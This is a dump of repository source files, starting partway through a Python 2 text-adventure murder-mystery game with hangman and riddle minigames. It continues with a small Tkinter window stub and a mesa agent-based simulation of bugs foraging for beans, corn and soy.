that?\"\\n\\\nSakshi: \"Everyone knows about that.\"\\n\\\nYou: \"Does everyone also know about your business feud with you best friend?\"\\n\\\nSakshi: \"I\\'d hardly call it a feud. If you\\'re even asking that question, you don\\'t know Nicole very well. Nicole is,\\\nwas, a sweetheart but she hated business. She didn\\'t make any of the decisions.\"\\n\\\nLiam: \"So what you\\'re saying is that your company would be better off if you killed the CEO but not Nicole?\"\\n\\\nSakshi: \"Exact—wait, what? That\\'s not what I\\'m saying at all! Are you accusing me of killing my best friend? I\\\nwould never! And especially not over business! If anyone here did it, it\\'s probably Andres. Leave me out of it.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"\\n'\n\ncupboard = 'You find a small container of tea grounds.\\n\\\nYou: \"This is probably the tea supply Leng had set aside for Nicole.\"\\n\\\nLiam: \"We should ask him about that. 
Why did he set aside a special little box for her?\"'\n\nfridge = 'Liam: \"I\\'m starving. You think they would mind if I grabbed a slice of pizza or something?\"\\n\\\nYou: \"At a crime scene where someone was poisoned? Yeah, you take that chance.\"'\n\nsink = 'You: \"Nothing but dirty dishes.\"\\n\\\nLiam: \"Figures. Don\\'t look at me, it\\'s not my job to clean them.\"'\n\nleng_2 = 'You: \"Leng, it seems like Nicole was poisoned.\"\\n\\\nLeng: \"Oh my god, that\\'s terrible. But how?\"\\n\\\nLiam: \"Maybe you can help us with that. Any reason you had special tea set aside for Nicole?\"\\n\\\nLeng: \"Yes, it\\'s called being considerate! Nicole loved that tea. It\\'s the same reason I bought Pop-tarts for Andres \\\nand organic orange juice for Sakshi. Are you guys insinuating that I killed her? Why would I? I cared about Nicole \\\nvery much. If anyone did it, it\\'s probably Bree! She\\'s the one who took Nicole her tea.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\nbree_2 = 'You: \"Bree, it seems that Nicole may have been poisoned.\"\\n\\\nBree: \"That\\'s awful.\"\\n\\\nLiam: \"Poison was found in her teacup. Can you explain how that happened?\"\\n\\\nBree: \"Are you saying that I--? No, no, of course not! I had nothing to do with it. All I did was prepare the tea Mr. Li\\\nand Ms. Nicole asked me to. That\\'s it! Why would I hurt Ms. Nicole?\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\ntrees = 'Liam: \"Yew!\"\\n\\\nYou: \"What?\"\\n\\\nLiam: \"I stepped on yew berries.\"\\n\\\nYou roll your eyes.'\n\nbushes = 'Liam: \"Any minute, we\\'re going to tumble down a rabbit hole.\"\\n\\\nYou: \"I don\\'t think that’s exactly how Alice in Wonderland worked.\"'\n\ngazebo = 'You find an old newspaper clipping that describes Andres punching another scientist.\\n\\\nYou: \"Who would have thought clarinet-boy would have a temper?\"\\n\\\nLiam: \"I did, I mean, it\\'s the clarinet. Under-appreciated in the music world just like the violas. That would make \\\nanyone angry.\"'\n\nandres_2 = 'You: \"Andres, it seems that Nicole may have been poisoned.\"\\n\\\nAndres: \"That\\'s so horrible. She didn\\'t deserve that.\"\\n\\\nLiam: \"No one deserves that. As a doctor, you would certainly know a good deal about poisons, right?\"\\n\\\nAndres: \"What are you trying to say? That I killed her? I would never do something like that. Nicole and I have \\\nalways had our ups and downs. We were even engaged at one point but we have always remained good friends and I \\\nwould never hurt her. You\\'re right about one thing though: I am a doctor but that means I save lives, not take them.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\ngabi_4 = 'Gabriella: \"I have good news, bad news, and confusing news.\"\\n\\\nLiam: \"Lay it on us.\"\\n\\\nGabriella: \"The tea grounds you brought; definitely poisoned.\"\\n\\\nYou: \"So that\\'s the good news?\"\\n\\\nGabriella: \"No, that\\'s the confusing news because the coroner sent me Nicole\\'s stomach contents and she didn\\'t drink \\\nany tea at all.\"\\n\\\nLiam: \"Then what poisoned her?\"\\n\\\nGabriella: \"You should check her room again. Maybe she ingested something else. Her blood toxicology report \\\nshowed opioid use. And now the good news is I opened Nicole\\'s phone. 
The bad news is: I opened Nicole\\'s phone.\"\\n\\\nYou: \"Meaning…?\"\\n\\\nGabriella: \"Entertain me for a bit and you get the passcode.\"'\n\nmessage_unknown = 'Unknown: Turn me in and I\\'ll spill your secret.'\n\nmessage_leng = 'Leng: Hey, babe.\\n\\\nNicole: Hey, sweets. Excited for this week. Speaking of which…\\n\\\nLeng: Please don\\'t start.\\n\\\nNicole: If you\\'re serious about us, you have to tell Sakshi. I don\\'t care about your restaurant funding. I\\'ll fund it!\\n\\\nLeng: Nicky, please.\\n\\\nNicole: It\\'ll get “her” off my back.\\n\\\nLeng: We\\'ll talk.'\n\nmessage_andres = 'Nicole: I\\'m glad you\\'re coming. Leng said you weren\\'t sure.\\n\\\nAndres: I\\'ll be there. Leng better have my Pop Tarts.\\n\\\nNicole: Ha ha. I\\'ll tell him. I hope we can clear some things up this week.\\n\\\nAndres: I already said I\\'m over it.\\n\\\nNicole: But there\\'s more. I want to do it in person.\\n\\\nAndres: Okay, see you soon.'\n\nend_messages = 'You: We have a lot more interviews to conduct.\"\\n\\\nLiam: \"And we still need to find what poisoned Nicole.\"\\n\\\nGabriella: \"And you have to sign my legalize Wiebe campaign.\"\\n\\\nYou and Liam give Gabriella a look.\\n\\\nGabriella: \"What? You guys have work to do. Get out of here.\"'\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. 
Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office \n\n#Initiators\nstart = 0 \npill_bottle = 0\ncase_solved = False \nwarning = 0\nconversation = 0\nsakshi_one = 0\nleng_one = 0\nbree_one = 0\nandres_one = 0\narrival = 0\nbedroom_arrival = 0\nsakshi_two = 0\nleng_two = 0\nbree_two = 0\nandres_two = 0\ngabi_four = 0\nmessages_read = 0\nleng_message = 0\nandres_message = 0\nunknown_message = 0\nmessage_end = 0\n\nglobal financial_riddle\nfinancial_riddle = False\n\nglobal passcode_won\npasscode_won = False\n\nglobal game_one\ngame_one = False\n\nglobal game_two\ngame_two = False\n\n\n\ndef save():\n global node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read\n with open('savegame.dat', 'wb') as f:\n pickle.dump([node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read], f, protocol=2)\n print 'Game successfully saved'\n \ndef load():\n global node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read\n with open('savegame.dat', 'rb') as f:\n node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read = pickle.load(f)\n print 'Game successfully loaded'\n#--------------------------------------------------------------------------------------------------------------------- \n\n\n\n\n#Actual Gameplay \n \nwhile True:\n while warning == 0:\n print('\\nDisclaimer: This game is not yet completely finished.\\n\\n')\n warning +=1\n print('\\n')\n print node.name\n \n if node == police_office and start == 0:\n print('\\n')\n print(scene_1)\n start +=1\n \n if node == police_office and case_solved == False:\n print(chief)\n \n if node == lab and len(user_inventory.inventory) == 0:\n print(gabi)\n \n if node == lab and len(user_inventory.inventory) == 1 and conversation <=4:\n print('\\nGabi: There\\'s another piece of evidence lurking around in that house. Go forth!')\n \n if node == front_yard and arrival == 0:\n print(scene_2)\n arrival+=1\n \n if node == bedroom and bedroom_arrival == 0:\n print(scene_3)\n bedroom_arrival+=1\n \n if node == study and sakshi_one == 0:\n print(sakshi_1)\n sakshi_one+=1\n conversation+=1\n \n if node == garden and andres_one == 0:\n print(andres_1)\n andres_one+=1\n conversation+=1\n \n if node == kitchen and leng_one == 0:\n print(leng_1)\n leng_one+=1\n conversation+=1\n \n if node == living_room and bree_one == 0:\n print(bree_1)\n bree_one+=1\n conversation +=1\n \n if conversation == 4 and len(user_inventory.inventory) == 2 and node == lab:\n print(gabi_2)\n conversation +=1\n \n if sakshi_two == 0 and sakshi_one == 1 and conversation == 4:\n study.description = 'You may now look under the sofa, in the bookshelf, and in the desk. Maybe there\\'s some evidence in here.'\n \n if leng_two == 0 and leng_one == 1 and conversation == 4:\n kitchen.description = 'You may search in the cupboard, in the sink, or in the fridge. 
Could there be something incriminating here?'\n \n if andres_two == 0 and andres_one == 1 and conversation == 4:\n garden.description = 'You can check out the area behind the trees, in the bushes, or in the gazebo. There might be something intresting here.' \n \n \n if node in [police_office, lab]:\n print('\\nYou can go to:\\n\\\n -mansion\\n\\\n -lab\\n\\\n -police office\\n\\\n \\n\\\nAdditional commands:\\n\\\n - search')\n elif node in [study, kitchen, front_yard, living_room, garden]:\n print('\\nYou can go to:\\n\\\n - study\\n\\\n - mansion\\n\\\n - kitchen\\n\\\n - crime scene\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab\\n\\\n \\n\\\nAdditional commands:\\n\\\n - search\\n\\\n - pick up *item name*')\n \n user_command = raw_input('> ') \n \n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n \n elif user_command =='save':\n save()\n elif user_command =='load':\n load()\n \n elif 'police office' in user_command:\n node = police_office\n \n elif 'study' in user_command and node in [front_yard, garden, living_room, kitchen, bedroom]:\n node = study\n \n elif 'garden' in user_command and node in [front_yard, study, living_room, kitchen, bedroom]:\n node = garden\n \n elif 'living room' in user_command and node in [front_yard, garden, study, kitchen, bedroom]:\n node = living_room\n \n elif 'kitchen' in user_command and node in [front_yard, garden, living_room, study, bedroom]:\n node = kitchen\n \n elif 'crime scene' in user_command and node in [front_yard, garden, living_room, kitchen, study]:\n node = bedroom\n \n elif 'lab' in user_command:\n node = lab\n \n elif 'mansion' in user_command:\n node = front_yard\n \n elif 'search' in user_command:\n print node.description\n \n #Games----------------------------------------------------------------------------------------------------------------\n \n #Setting up variables to be called on later\n \n def passcode_hangman():\n\n life = 5\n bank = [\"zero one twenty nine\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n user_guesses = [] #More variables\n wrong_answers = 0\n print (\"You have five chances right now.\")\n while life > 0: \n \n for letter in word:\n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n break\n \n if life<=0:\n print('Gabriella: \"Ha! 
Come back and try again.\"')\n \n else:\n print('\\n')\n print('Gabriella: \"Which conversation do you wanna read?\"\\\n - Leng\\n\\\n - Andres\\n\\\n - Unknown')\n hang.inventory.append(pic_3)\n \n \n \n def andres_hangman():\n life = 5\n bank = [\"temper tantrum\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n user_guesses = [] #More variables\n wrong_answers = 0\n print (\"You have five chances right now.\")\n while life > 0: \n \n for letter in word:\n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n break\n \n if life <=0:\n print 'You\\'ve lost this minigame, come back and try again.'\n else:\n print('\\n')\n print(gazebo)\n hang.inventory.append(pic)\n \n def leng_hangman():\n life = 5\n bank = [\"poisonous tea?\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n if '?' in word:\n letters_left.remove('?')\n \n user_guesses = [] #More variables\n wrong_answers = 0\n while life > 0: \n \n for letter in word: \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n elif letter == '?':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: %s\")%life\n \n if len(letters_left) == 0:\n break\n \n if life <=0:\n print 'You\\'ve messed up on this minigame. Come back and try again.'\n else: \n print('\\n') \n print(cupboard)\n hang.inventory.append(pic_2)\n \n\n def financial_riddle():\n key = 'bree'\n #Time = 20 seconds; if they don\\'t leave in time, lose game.\n \n riddle = 'There is one of us here in the mansion\\n\\\n Who is not what they seem\\n\\\n They may seem to be kind\\n\\\n But that\\'s a mirage and a dream\\n\\\n Simple-like fashion\\n\\\n With formal like language\\n\\\n And a nervous register\\n\\\n Who am I?\\n'\n \n print riddle\n \n user_riddle_guess = raw_input('Take a guess:\\n')\n if user_riddle_guess.strip().lower() == key:\n print 'You have guessed correctly;\\n\\\n it is Bree. Press \"enter\" to continue and see \\n\\\n what you find.' \n user_riddle_guess_two = raw_input('> ')\n if user_riddle_guess_two.strip() == '':\n user_inventory.inventory.append(paperwork)\n print riddle_win \n \n else:\n print 'Sorry. 
That\\'s not who it is.\\n'\n print 'You and Liam quickly cover your ears.\\n\\\n Liam: \"What is that horrible ringing noise?!\"\\n\\\n You: \"We must have set off an alarm when we tried opening the desk lock!\\n\\\n Liam: \"We have to get out of the mansion!\"\\n\\\n You: \"Now!!\"'\n \n if financial_riddle == False and node == study and sakshi_one >0:\n if 'desk' in user_command:\n financial_riddle()\n \n elif 'under sofa' in user_command:\n print(sofa)\n \n elif 'bookshelf'in user_command:\n print(bookshelf)\n \n if paperwork in user_inventory.inventory:\n financial_riddle = True\n \n if financial_riddle == True and node == study and sakshi_two == 0 and sakshi_one>0:\n print(sakshi_2)\n sakshi_two+=1\n \n if game_one == False and node == garden and andres_one >0:\n if 'gazebo' in user_command:\n andres_hangman()\n \n elif 'bushes' in user_command:\n print(bushes)\n \n elif 'trees' in user_command:\n print(trees)\n \n \n if pic in hang.inventory:\n game_one = True \n \n if game_one == True and node == garden and andres_two == 0 and andres_one >0:\n print(andres_2)\n andres_two+=1\n \n if game_two == False and node == kitchen and leng_one >0:\n if 'cupboard' in user_command:\n leng_hangman()\n \n elif 'fridge' in user_command:\n print(fridge)\n \n elif 'sink' in user_command:\n print(sink)\n \n if pic_2 in hang.inventory:\n game_two = True\n \n if game_two == True and node == kitchen and leng_two == 0 and leng_one >0:\n print(leng_2)\n leng_two +=1\n \n if node == living_room and bree_two == 0 and bree_one >0:\n print(bree_2)\n bree_two +=1\n \n if leng_two == 1 and bree_two == 1 and andres_two == 1 and sakshi_two == 1 and node == lab:\n print(gabi_4)\n passcode_hangman()\n \n if messages_read < 3 and pic_3 in hang.inventory:\n \n if 'leng' in user_command:\n print(message_leng)\n leng_message +=1\n if leng_message == 1:\n messages_read +=1\n \n if 'andres' in user_command:\n print(message_andres)\n andres_message +=1\n if andres_message == 1:\n messages_read +=1\n \n if 'unknown' in user_command:\n print(message_unknown)\n unknown_message +=1\n if unknown_message ==1:\n messages_read +=1\n \n if messages_read == 3 and node == lab and message_end == 0:\n print(end_messages)\n message_end+=1\n print('\\nWell, that\\'s all the sleuthing we have for now!')\n \n \n elif 'examine body' in user_command:\n print(examine)\n \n elif user_command == 'pick up chair' and node == study:\n chair.pick_up(user_inventory)\n \n elif user_command == 'pick up glass' and node == study:\n water_glass.pick_up(user_inventory)\n \n elif user_command == 'pick up pen' and node == study:\n pen.pick_up(user_inventory)\n \n elif user_command == 'pick up cell phone' and node == bedroom:\n cell_phone.pick_up(user_inventory)\n \n elif user_command == 'look under bed' and node == bedroom:\n print(phone)\n \n elif user_command == 'pick up teacup' and node == bedroom:\n teacup.pick_up(user_inventory)\n print(cup)\n \n elif user_command == 'pick up morphine capsules' and node == bedroom:\n morphine_capsules.pick_up(user_inventory)\n \n elif user_command == 'check trash' and node == front_yard:\n print \n \n elif user_command == 'pick up pill bottle' and node == front_yard:\n pill_bottle.pick_up(user_inventory)\n pill_bottle+=1\n \n elif user_command == 'pick up vase' and node == living_room:\n vase_2.pick_up(user_inventory)\n \n elif user_command == 'pick up pen' and node == living_room:\n pen_2.pick_up(user_inventory)\n \n elif user_command == 'pick up wrapper' and node == garden:\n wrapper.pick_up(user_inventory)\n \n 
elif user_command == 'pick up clarinet' and node == garden:\n clarinet.pick_up(user_inventory)\n\n elif user_command == 'pick up news clipping' and node == garden:\n news_clipping.pick_up(user_inventory)\n \n else:\n print '?'\n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n"
},
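The minigame routines in the file above mix Python 2 print statements with Python 3 call syntax; a minimal Python 3 sketch of the same hangman guess loop (the word bank and prompts are stand-ins, not the game's full script):

import random

def hangman(bank, lives=5):
    """One round of the game's guess loop, Python 3 style."""
    word = random.choice(bank)
    letters_left = set(word) - {' ', '?'}  # spaces/punctuation are shown, not guessed
    guesses = set()
    while lives > 0 and letters_left:
        # Mask letters that have not been guessed yet.
        print(' '.join(c if c in guesses or not c.isalpha() else '_' for c in word))
        guess = input('Guess a letter: ').strip().lower()
        guesses.add(guess)
        if guess in letters_left:
            letters_left.discard(guess)
        else:
            lives -= 1
            print('Your life count: %d' % lives)
    return not letters_left  # True once every letter is revealed

if __name__ == '__main__':
    won = hangman(["temper tantrum"])
    print('You win!' if won else 'Come back and try again.')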
{
"alpha_fraction": 0.6785714030265808,
"alphanum_fraction": 0.711904764175415,
"avg_line_length": 29.071428298950195,
"blob_id": "06ea7364ae48a3674622d9bf70d4f5c1c268e186",
"content_id": "9d8b8a46670d86f31975fd00e848e6f760340166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 14,
"path": "/Caroline GUI.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "import Tkinter, tkFont\n\nroot = Tkinter.Tk()\nroot.title('Sin')\n\ncanvas = Tkinter.Canvas(root, height = 750, width = 1400, relief = Tkinter.RAISED, bg = 'white')\ncanvas.grid()\n\nscrollbar = Tkinter.Scrollbar(root)\nscrollbar.grid(row = 0, column = 6, rowspan = 4, sticky = Tkinter.N + Tkinter.S)\n\neditor = Tkinter.Text(mastr=canvas, width = 45, height = 10, yscroll = scrollbar.set)\n\nscrollbar.config(command = editor.yview)"
}
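For reference, the same editor-plus-scrollbar wiring in Python 3 tkinter (a sketch; widget sizes and grid positions are arbitrary):

import tkinter as tk

root = tk.Tk()
root.title('Sin')

# The Text widget reports its view through yscrollcommand, and the
# scrollbar drives it back through editor.yview.
scrollbar = tk.Scrollbar(root)
scrollbar.grid(row=0, column=1, sticky=tk.N + tk.S)

editor = tk.Text(root, width=45, height=10, yscrollcommand=scrollbar.set)
editor.grid(row=0, column=0)

scrollbar.config(command=editor.yview)
root.mainloop()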
] | 6 |
dadaromeo/adventures-in-dataland
|
https://github.com/dadaromeo/adventures-in-dataland
|
736c3b83920c784183d5eaf6c6d294701ebdb799
|
67bceed73b59ee0325c2c9c3ce6069286bd88771
|
a034e0e0f3316071c9ad9fb13ee82436ae654a19
|
refs/heads/master
| 2021-06-28T05:10:23.201248 | 2017-09-17T00:10:01 | 2017-09-17T00:10:01 | 62,259,480 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5476522445678711,
"alphanum_fraction": 0.5541608333587646,
"avg_line_length": 32.625,
"blob_id": "5ae2a5fe08a990abeeb4f71c2a5796c3d32ad847",
"content_id": "7eb5f6cd1928a6ee362f4d0915b044c9b38cebe4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2151,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/foraging/model.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "from mesa.model import Model\nfrom mesa.space import SingleGrid\nfrom mesa.time import RandomActivation\nfrom mesa.datacollection import DataCollector\n\nfrom foraging.agents import Bean, Corn, Soy, Bug\n\nclass Foraging(Model):\n \n number_of_bean = 0\n number_of_corn = 0\n number_of_soy = 0\n \n def __init__(self, width=50, height=50, torus=True, num_bug=50, seed=42, strategy=None):\n super().__init__(seed=seed)\n self.number_of_bug = num_bug\n if not(strategy in [\"stick\", \"switch\"]):\n raise TypeError(\"'strategy' must be one of {stick, switch}\")\n self.strategy = strategy\n \n self.grid = SingleGrid(width, height, torus)\n self.schedule = RandomActivation(self)\n data = {\"Bean\": lambda m: m.number_of_bean,\n \"Corn\": lambda m: m.number_of_corn,\n \"Soy\": lambda m: m.number_of_soy,\n \"Bug\": lambda m: m.number_of_bug,\n }\n self.datacollector = DataCollector(data)\n \n # create foods\n self._populate(Bean)\n self._populate(Corn)\n self._populate(Soy)\n \n # create bugs\n for i in range(self.number_of_bug):\n pos = self.grid.find_empty()\n bug = Bug(i, self)\n bug.strategy = self.strategy\n self.grid.place_agent(bug, pos)\n self.schedule.add(bug)\n \n def step(self):\n self.schedule.step()\n self.datacollector.collect(self)\n \n if not(self.grid.exists_empty_cells()):\n self.running = False\n \n def _populate(self, food_type):\n prefix = \"number_of_{}\"\n \n counter = 0\n while counter < food_type.density * (self.grid.width * self.grid.height):\n pos = self.grid.find_empty()\n food = food_type(counter, self)\n self.grid.place_agent(food, pos)\n self.schedule.add(food)\n food_name = food_type.__name__.lower()\n attr_name = prefix.format(food_name)\n val = getattr(self, attr_name)\n val += 1\n setattr(self, attr_name, val)\n counter += 1"
},
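The model above can also be exercised headlessly; a minimal sketch (assumes mesa and its pandas dependency are installed; the 100-step budget is arbitrary):

from foraging.model import Foraging

model = Foraging(width=50, height=50, num_bug=50, strategy="stick")
for _ in range(100):
    if not model.running:  # the model stops itself once the grid fills up
        break
    model.step()

# DataCollector exposes the per-step food/bug counts as a DataFrame.
print(model.datacollector.get_model_vars_dataframe().tail())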
{
"alpha_fraction": 0.6227164268493652,
"alphanum_fraction": 0.6314535140991211,
"avg_line_length": 26.9777774810791,
"blob_id": "09b0d0c94a7f3661c8aa9b3deb0baf53ea265c9a",
"content_id": "8b55e7e5d0ad9ceb2b260c0fff1bbc76d610bcec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/foraging/server.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "from mesa.visualization.modules import CanvasGrid, ChartModule\nfrom mesa.visualization.ModularVisualization import ModularServer\n\nfrom foraging.agents import Bean, Corn, Soy, Bug\nfrom foraging.model import Foraging\n\nwidth = 50\nheight = 50\n\ndef food_portrayal(agent):\n \n if agent is None:\n return\n \n portrayal = {\"Shape\": \"rect\", \"Filled\": \"true\", \"w\": 0.8, \"h\": 0.8, \"Layer\": 0}\n \n if type(agent) is Bean:\n portrayal[\"Color\"] = \"cornflowerblue\"\n \n elif type(agent) is Corn:\n portrayal[\"Color\"] = \"blueviolet\"\n \n elif type(agent) is Soy:\n portrayal[\"Color\"] = \"forestgreen\"\n \n elif type(agent) is Bug:\n portrayal[\"Shape\"] = \"circle\"\n portrayal[\"Color\"] = \"tomato\"\n portrayal[\"r\"] = 1\n portrayal[\"Layer\"] = 1\n \n return portrayal\n\nbean = {\"Label\": \"Bean\", \"Color\": \"cornflowerblue\"}\ncorn = {\"Label\": \"Corn\", \"Color\": \"blueviolet\"}\nsoy = {\"Label\": \"Soy\", \"Color\": \"forestgreen\"}\nbug = {\"Label\": \"Bug\", \"Color\": \"tomato\"}\n\ncanvas = CanvasGrid(food_portrayal, width, height)\nchart_count = ChartModule([bean, corn, soy, bug])\n\nmodel_params = {\"strategy\": \"stick\"}\nserver = ModularServer(Foraging, [canvas, chart_count], name=\"Foraging\", model_params)\n\nserver.launch()\n"
},
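model_params entries can also be interactive controls; a sketch using UserSettableParameter from the mesa versions that ship ModularServer, exposing the strategy choice in the browser instead of hard-coding "stick" (import path may vary by mesa version):

from mesa.visualization.UserParam import UserSettableParameter

model_params = {
    "strategy": UserSettableParameter(
        "choice", "Foraging strategy", value="stick", choices=["stick", "switch"]
    ),
}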
{
"alpha_fraction": 0.5194884538650513,
"alphanum_fraction": 0.5219244956970215,
"avg_line_length": 34.71739196777344,
"blob_id": "0bcbf22863cd6ad91e6e069226709772c76a1b37",
"content_id": "0aca35f1a6f9af2b24eb83f9bfe796a9041f8525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/foraging/resources.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom mesa.agent import Agent\n\nclass Food(Agent):\n \n fully_grown = False\n \n def __init__(self, unique_id, model, pos=None):\n super().__init__(unique_id, model)\n self.pos = pos\n \n def step(self):\n if self.fully_grown:\n self.energy -= self.wilt_rate\n else:\n self.energy += self.growth_rate\n \n if self.energy >= self.max_growth:\n self.fully_grown = True\n \n # new Food\n if self.fully_grown and (self.energy >= self.max_growth):\n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n is_empty = self.model.grid.is_cell_empty\n \n if any(map(is_empty, neig)):\n empty = list(filter(is_empty, neig))\n pos = random.choice(empty)\n food_name = type(self).__name__.lower()\n attr_name = \"number_of_{}\".format(food_name)\n last = getattr(self.model, attr_name)\n new_food = type(self)(last + 1, self.model)\n self.energy -= new_food.energy\n setattr(self.model, attr_name, last + 1)\n self.model.grid.place_agent(new_food, pos)\n self.model.schedule.add(new_food)\n \n # Death\n if self.energy <= 0:\n food_name = type(self).__name__.lower()\n attr_name = \"number_of_{}\".format(food_name)\n last = getattr(self.model, attr_name)\n self.model.grid._remove_agent(self.pos, self)\n self.model.schedule.remove(self)\n setattr(self.model, attr_name, last - 1)"
},
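The growth/wilt cycle in Food.step is easy to check in isolation; a standalone sketch of the same state machine (names mirror the attributes in resources.py, defaults are Corn's values):

def grow_step(energy, fully_grown, growth_rate=2, wilt_rate=1, max_growth=10):
    """One tick of the Food energy state machine."""
    if fully_grown:
        energy -= wilt_rate
    else:
        energy += growth_rate
    if energy >= max_growth:
        fully_grown = True
    return energy, fully_grown

energy, fully_grown = 2, False
for tick in range(8):
    energy, fully_grown = grow_step(energy, fully_grown)
    print(tick, energy, fully_grown)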
{
"alpha_fraction": 0.5350318551063538,
"alphanum_fraction": 0.5477706789970398,
"avg_line_length": 18.75,
"blob_id": "050bf4eb8875ee3769d5bd2bfca72b6682342521",
"content_id": "9bce5cf85add1d9b5b1e7f1f0be23a58034bcfdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/foraging/utils.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import math\n\ndef euclidean(u, v):\n \"\"\"The euclidean distance between two points.\"\"\"\n \n x,y = u\n i,j = v\n return math.sqrt((x-i)**2 + (y-j)**2)"
},
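The helper above is equivalent to math.hypot applied to the coordinate deltas; a quick check (run from the repo root so the import resolves):

import math

from foraging.utils import euclidean

assert euclidean((0, 0), (3, 4)) == 5.0
assert euclidean((0, 0), (3, 4)) == math.hypot(3, 4)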
{
"alpha_fraction": 0.5085899233818054,
"alphanum_fraction": 0.5228525400161743,
"avg_line_length": 25.60344886779785,
"blob_id": "0475b3a6831097e61cd09a262f03655cb22a6d56",
"content_id": "7c0e9a102c92375ae0a6a7ed3fa439a4e6429442",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3085,
